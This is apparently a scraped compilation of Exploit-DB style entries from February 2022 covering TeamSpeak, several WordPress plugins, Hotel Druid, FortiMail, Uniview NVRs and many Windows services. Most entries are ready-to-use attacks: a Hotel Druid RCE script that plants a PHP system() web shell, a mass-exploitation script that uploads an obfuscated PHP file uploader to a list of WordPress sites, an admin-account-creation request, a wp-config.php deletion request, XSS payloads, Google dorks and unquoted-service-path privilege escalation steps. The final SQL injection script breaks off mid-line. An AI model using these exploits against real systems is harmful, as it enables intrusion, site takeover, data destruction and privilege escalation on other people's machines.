ISHACK AI BOT

# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions # Date: 2022-02-15 # Exploit Author: Aryan Chehreghani # Contact: [email protected] # Vendor Homepage: https://www.teamspeak.com # Software Link: https://www.teamspeak.com/en/downloads # Version: 3.5.6 # Tested on: Windows 10 x64 # [ About - TeamSpeak ]: #TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP), #application for audio communication between users on a chat channel, #much like a telephone conference call, Users typically use headphones with a microphone, #The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels, #The target audience for TeamSpeak is gamers, who can use the software to communicate, #with other players on the same team of a multiplayer video game, #Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls. # [ Description ]: #The TeamSpeak Application was installed with insecure file permissions. #It was found that all folder and file permissions were incorrectly configured during installation. #It was possible to replace the service binary. # [ POC ]: C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe createfileassoc.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) error_report.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) package_inst.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) ts3client_win32.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) Uninstall.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) update.exe NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) WIN-FREMP1UB3LB\Administrator:(F) Successfully processed 7 files; Failed processing 0 files # [ Exploit - Privilege Escalation ]: #Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ... #with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)

# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated) # Author: Luis Martinez # Discovery Date: 2022-02-13 # Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features # Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568 # Tested Version: NVR304-16EP # Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr # Vulnerability Type: Reflected Cross-Site Scripting (XSS) # CVE: N/A # Proof of Concept: http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>

# Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-13 # Vendor Homepage: https://www.emerson.com/en-us # Software Link : https://www.opertek.com/descargar-software/?prc=_326 # Tested Version: 9.80 Build 8695 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """ Trapi File Server TrapiServer C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe Auto # Service info: C:\>sc qc TrapiServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: TrapiServer TYPE : 120 WIN32_SHARE_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Trapi File Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated) # Date: 09-11-2021 # Exploit Author: Ceylan Bozogullarindan # Exploit Website: https://bozogullarindan.com # Vendor Homepage: https://bestwebsoft.com/ # Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/ # Version: 1.1.1 # Tested on: Linux # CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0) # Description: Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file! I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users. An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files. # Steps To Reproduce 1. Install and activate the plugin. 2. Click the "Log Monitor" available under Error Log Viewer menu item. 3. Choose a log file to clear. 4. Intercept the request via Burp or any other local proxy tool. 5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php. 6. Check the content of the cleared file. You will see that the file is empty. # PoC - Supported Materials --------------------------------------------------------------------------- POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1 Host: 127.0.0.1:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 603 Connection: close Upgrade-Insecure-Requests: 1 Cookie: [admin+] rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php ---------------------------------------------------------------------------

# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation # Date: 16.02.2022 # Author: Numan Türle # CVE: CVE-2022-0441 # Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ # Version: <2.7.6 # https://www.youtube.com/watch?v=SI_O6CHXMZk # https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6 # https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1 Connection: close Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip, deflate Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 Content-Type: application/json Content-Length: 339 {"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE) # Date: 05/01/2022 # Exploit Author: 0z09e (https://twitter.com/0z09e) # Vendor Homepage: https://www.hoteldruid.com/ # Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz # Version: 3.0.3 # CVE : CVE-2022-22909 #!/usr/bin/python3 import requests import argparse def login( target , username = "" , password = "", noauth=False): login_data = { "vers_hinc" : "1", "nome_utente_phpr" : username, "password_phpr" : password } if not noauth: login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False ) if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text: token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0] anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0] ret_data = {"token" : token , "anno" : anno} #print("ret data" + ret_data) return ret_data else: return False else: login_req = requests.get(f"{target}/inizio.php" , verify=False ) try: anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0] token = "" ret_data = {"token" : token , "anno" : anno} return ret_data except: return False def check_privilege(target , anno , token=""): priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False) #print(priv_req.text) if "Modify" in priv_req.text: return True else: return False def add_room(target , anno , token=""): add_room_data = { "anno": anno, "id_sessione": token, "n_app":"{${system($_REQUEST['cmd'])}}", "crea_app":"SI", "crea_letti":"", "n_letti":"", "tipo_tabella":"appartamenti" } add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False) #print(add_req.text) if "has been added" in add_req.text: return True else: return False def test_code_execution(target): code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id") if "uid=" in code_execution_req.text: return code_execution_req.text.split("\n")[0] else: return False def main(): banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$ | $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ | $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$ | $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$ |__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n""" parser = argparse.ArgumentParser() req_args = parser.add_argument_group('required arguments') req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True) req_args.add_argument("-u" , "--username" , help="Username" , required=False) req_args.add_argument("-p" , "--password" , help="password", required=False) req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False) args = parser.parse_args() target = args.target if target[-1] == "/": target = target[:-1] noauth = args.noauth username = args.username password = args.password if noauth == False and (username == None or password == None): print('[-] Please provide the authentication method.' ) quit() print(banner) if not noauth: print(f"[*] Logging in with the credential {username}:{password}") login_result = login(username = username , password = password , target = target) if login_result != False: token = login_result.get('token') anno = login_result.get('anno') else: print("[-] Login failed, Check your credential or check if login is required or not .") quit() else: print('[*] Trying to access the Dashboard.') login_result = login(username = username , password = password , target = target , noauth=True) if login_result != False: token = login_result.get('token') anno = login_result.get('anno') else: print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.') exit() print("[*] Checking the privilege of the user.") if check_privilege(target= target , token=token , anno=anno): print("[+] User has the privilege to add room.") else: print("[-] User doesn't have the privilege to add room.") exit() print("[*] Adding a new room.") if add_room(target = target , anno=anno , token=token): print('[+] Room has been added successfully.') else: print('[-] Unknown error occured, unable to add room. Maybe the room has already been added') exit() print('[*] Testing code exection') output = test_code_execution(target = target) if output != False: print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.") print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id') print(f"[+] Example Output : {output}") exit() else: print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname") exit() main()

# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated) # Google Dork: inurl:wp-content/plugins/dzs-zoomsounds # Date: 16/02/2022 # Exploit Author: Overthinker1877 (1877 Team) # Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/ # Version: 6.60 # Tested on: Windows / Linux import os import requests import threading from multiprocessing.dummy import Pool,Lock from bs4 import BeautifulSoup import time import smtplib,sys,ctypes from random import choice from colorama import Fore from colorama import Style from colorama import init import re import time from time import sleep init(autoreset=True) fr = Fore.RED gr = Fore.BLUE fc = Fore.CYAN fw = Fore.WHITE fy = Fore.YELLOW fg = Fore.GREEN sd = Style.DIM sn = Style.NORMAL sb = Style.BRIGHT Bad = 0 Good = 0 def Folder(directory): if not os.path.exists(directory): os.makedirs(directory) Folder("exploited") def clear(): try: if os.name == 'nt': os.system('cls') else: os.system('clear') except: pass def finder(i) : global Bad,Good head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} try : x = requests.session() listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php'] for script in listaa : url = (i+"/"+script) while True : req_first = x.get(url, headers=head) if "error:http raw post data does not exist" in req_first.text : burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"} burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>" requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45) urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php") req_second = x.get(urlx, headers=head) if "Overthinker1877" in req_second.text : Good = Good + 1 print(fg+"Exploited "+fw+">> "+fg+" = "+urlx) with open("exploited/shell.txt","a") as file : file.write(urlx+"\n") file.close() else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit") else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln") pass break except : pass if os.name == 'nt': ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad)) else : sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad)) def key_logo(): clear = '\x1b[0m' colors = [36, 32, 34, 35, 31, 37] x = ' [ + ] OVERTHINKER1877 EXPLOIT' for N, line in enumerate(x.split('\n')): sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear)) time.sleep(0.05) def process(line): time.sleep(1) def run() : key_logo() clear() print(""" [-] -----------------------------------------[-] [+] WwW.1877.TeaM [-] -----------------------------------------[-] \n \n""") file_name = input("Website List : ") op = open(file_name,'r').read().splitlines() TEXTList = [list.strip() for list in op] p = Pool(int(input('Thread : '))) p.map(finder, TEXTList) run()

# Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-17 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/drfone_full3360.exe # Tested Version: 11.4.9 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """ Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto # Service info: C:\>sc qc DFWSIDService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DFWSIDService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare WSID help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-17 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/mobiletrans_full5793.exe # Tested Version: 3.5.9 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """ Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto # Service info: C:\>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-17 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download-es.wondershare.com/famisafe_full7869.exe # Tested Version: 1.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """ FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto # Service info: C:\>sc qc FSService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FSService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FSService DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2022-02-17 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/ubackit_full8767.exe # Tested Version: 2.0.5 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """ Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto # Service info: C:\>sc qc wsbackup [SC] QueryServiceConfig SUCCESS SERVICE_NAME: wsbackup TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare wsbackup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS) # Google Dork: inurl:/fmlurlsvc/ # Date: 01-Feb-2022 # Exploit Author: Braiant Giraldo Villa # Contact: @iron_fortress (Twitter) # Vendor Homepage: https://www.fortinet.com/products/email-security # Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online) # Version: # FortiMail version 7.0.1 and below # FortiMail version 6.4.5 and below # FortiMail version 6.2.7 and below # CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185) 1. Description: An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service. 2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E 3. Proof of Concept: https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E 4. References https://www.fortiguard.com/psirt/FG-IR-21-185 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062

#Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2022-02-17 #Vendor : TOSHIBA #Version : TOSHIBA Navi Support Service 1.00.0000 #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\Users\Administrador>sc qc TNaviSrv [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: TNaviSrv TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : TOSHIBA Navi Support Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path #Exploit Date: 2022-02-17 #Vendor : IVT Corp #Version : BlueSoleilCS 5.4.277 #Vendor Homepage : www.ivtcorporation.com #Tested on OS: Windows 7 Pro #This software installs EDTService.exe version 11.10.2.1 #Analyze PoC : ============== C:\>sc qc BlueSoleilCS [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: BlueSoleilCS TIPO : 120 WIN32_SHARE_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleilCS.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : BlueSoleilCS DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2022-02-17 #Vendor : Intel #Version : Intel(R) Management Engine Components 6.0.0.1189 #Vendor Homepage : https://www.intel.com #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc LMS [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: LMS TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Intel(R) Management and Security Application Local Management Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2022-02-14 #Vendor : Hewlett-Packard(HP) #Version : File Sanitizer for HP ProtectTools 5.0.1.3 #Vendor Homepage : http://www.hp.com #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc HPFSService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: HPFSService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\HPFSService.exe GRUPO_ORDEN_CARGA : File System ETIQUETA : 0 NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2022-02-17 #Vendor : Connectify Inc #Version : Connectify Hotspot 2018 #Vendor Homepage : https://www.connectify.me/ #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc Connectify [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Connectify TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Connectify\ConnectifyService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Connectify Hotspot 2018 DEPENDENCIAS : wlansvc : winmgmt : http NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: HMA VPN 5.3 - Unquoted Service Path # Date: 18/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.hidemyass.com/ # Software Link: https://www.hidemyass.com/en-us/downloads # Version: 5.3.5913.0 # Tested: Windows 10 Pro x64 es C:\Users\saudh>sc qc HmaProVpn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HmaProVpn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Privax\HMA VPN\VpnSvc.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HMA VPN DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) # Date 18.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.getperfectsurvey.com/ # Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip # Version: < 1.5.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24762 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md ''' Description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. ''' banner = ''' ___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____ _(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____) (_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_) (_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_) (_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___ (___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______) [+] Perfect Survey - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = 